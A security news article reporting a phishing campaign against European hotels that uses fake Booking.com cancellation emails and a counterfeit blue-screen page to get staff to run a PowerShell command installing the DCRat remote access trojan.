European hotels are currently dealing with an active phishing campaign that is specifically designed to exploit trust in Booking.com cancellation notifications. The campaign targets hotel staff and property operators by sending emails that appear to be legitimate booking cancellation messages. These emails are crafted to look authentic and closely resemble routine communications that hotels receive daily, increasing the likelihood that recipients will open them and follow the embedded instructions without suspicion.
According to security researchers, the attack chain begins when the recipient clicks a link within the fraudulent cancellation email. This action redirects the victim to a fake website that mimics a system error environment. Upon loading, users are shown a counterfeit blue screen message that claims a critical system issue has occurred and immediate action is required. The page instructs victims to run a PowerShell command presented as a fix to resolve the supposed error. Because hotel environments often rely on shared systems and front desk machines with frequent user interaction, attackers are able to take advantage of urgency and confusion, prompting staff to follow the instructions without verifying their legitimacy.
Once the PowerShell command is executed, the infection process begins. The malicious script installs DCRat, a remote access trojan that allows attackers to gain persistent control over the compromised system. The malware is deployed through MSBuild.exe, a legitimate Microsoft utility that is often abused by threat actors to evade detection. By leveraging a trusted system binary, the attackers reduce the chances of triggering immediate security alerts. During the installation process, the malware also modifies Microsoft Defender settings by adding exclusions, effectively weakening the system’s built in protection and allowing the threat to operate with reduced interference. This step ensures that the malware remains active on the system for extended periods and can survive reboots, making remediation more complex for affected organizations.
The presence of DCRat on infected machines gives attackers a broad range of capabilities. These include monitoring user activity, capturing credentials, executing additional commands, and potentially spreading laterally across connected systems. For hotels, this poses serious risks, as compromised endpoints may provide access to reservation systems, customer data, internal communications, and payment related information. The campaign highlights how threat actors continue to refine social engineering techniques by blending technical deception with realistic business scenarios. By abusing a well known travel platform and common operational workflows, the attackers are able to bypass traditional skepticism and exploit human behavior as the weakest link in cybersecurity defenses. Security teams are urging hospitality organizations to remain alert to unexpected cancellation emails, reinforce user awareness, and restrict the execution of unauthorized scripts to reduce exposure to similar attacks.
Follow the SPIN IDG WhatsApp Channel for updates across the Smart Pakistan Insights Network covering all of Pakistan’s technology ecosystem.
